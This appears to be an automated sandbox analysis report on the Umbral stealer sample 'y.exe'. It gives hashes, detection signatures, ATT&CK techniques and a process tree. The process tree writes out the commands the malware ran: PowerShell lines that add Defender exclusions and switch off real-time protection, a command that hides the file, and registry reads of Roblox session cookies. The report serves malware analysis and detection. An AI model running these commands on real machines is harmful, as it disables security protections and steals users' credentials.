Analysis

  • max time kernel
    7s
  • max time network
    9s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240730-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-07-2024 17:34

General

  • Target

    y.exe

  • Size

    224KB

  • MD5

    4c335d3e3958413df7b9c81b7ac29100

  • SHA1

    a43f7ae504164fd29a9bb7f88430efeb396ed69f

  • SHA256

    7ba28499d2c1399eba708b00fdc97095f938d5755d148fbe5626ffa68b8e5385

  • SHA512

    28008caa99955df01abf2d9756c204b0b4105659ea1150c32a54044f60b3ac7a1c0631530e6b6e3bdd377ecaa6aac4c7845691262d18979cc1f74709a13bfce2

  • SSDEEP

    6144:floZM+rIkd8g+EtXHkv/iD4SQzYkK8eucHi:doZtL+EP8RR

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\y.exe
    "C:\Users\Admin\AppData\Local\Temp\y.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1376
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4460
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\y.exe"
      2⤵
      • Views/modifies file attributes
      PID:5012
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\y.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2252
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4552
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4280
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3868

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    6c47b3f4e68eebd47e9332eebfd2dd4e

    SHA1

    67f0b143336d7db7b281ed3de5e877fa87261834

    SHA256

    8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c

    SHA512

    0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    948B

    MD5

    6a29e9f9eb72c3bffbb054cd27e3ceea

    SHA1

    d38f7c2ad68dcf1d24deca9792256ff53d5218b2

    SHA256

    7a9f831f96b9e4843751dea3ed57ee11d70bb83a5970ddf9d6bd440f4def442c

    SHA512

    b4826f172c6ac60ad17412a634987c45640b1b8fe03aecba26510ae224685bcd571bc4b131724036e2b502b3a8198fb69414be8c72e46f833f0601a15d313430

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    71418d0b9965891dd306df50dd80a200

    SHA1

    a0df11b105d282fdce36532bc9edb82a410ac070

    SHA256

    2c63e7f45102284aaf6f22dfbccf6055a9de6b9163b1589ac766be7b2f8fbb52

    SHA512

    e399b8c48ba33ba7417f7be56eab4489a32f5f39d7fc580a7e01b50ab6565476dac55b769926f36148664ea377b4622b9d537e08d8964fa6b870b2facae0d2bd

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xhlclbqk.pym.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1376-33-0x0000019DF7E00000-0x0000019DF7E1E000-memory.dmp

    Filesize

    120KB

  • memory/1376-1-0x00007FFB29313000-0x00007FFB29315000-memory.dmp

    Filesize

    8KB

  • memory/1376-2-0x00007FFB29310000-0x00007FFB29DD1000-memory.dmp

    Filesize

    10.8MB

  • memory/1376-0-0x0000019DF6180000-0x0000019DF61BE000-memory.dmp

    Filesize

    248KB

  • memory/1376-70-0x0000019DF8930000-0x0000019DF8942000-memory.dmp

    Filesize

    72KB

  • memory/1376-69-0x0000019DF87B0000-0x0000019DF87BA000-memory.dmp

    Filesize

    40KB

  • memory/1376-31-0x0000019DF8950000-0x0000019DF89C6000-memory.dmp

    Filesize

    472KB

  • memory/1376-32-0x0000019DF8750000-0x0000019DF87A0000-memory.dmp

    Filesize

    320KB

  • memory/2252-13-0x00007FFB29310000-0x00007FFB29DD1000-memory.dmp

    Filesize

    10.8MB

  • memory/2252-17-0x00007FFB29310000-0x00007FFB29DD1000-memory.dmp

    Filesize

    10.8MB

  • memory/2252-12-0x000002462A560000-0x000002462A582000-memory.dmp

    Filesize

    136KB

  • memory/2252-15-0x00007FFB29310000-0x00007FFB29DD1000-memory.dmp

    Filesize

    10.8MB

  • memory/2252-14-0x00007FFB29310000-0x00007FFB29DD1000-memory.dmp

    Filesize

    10.8MB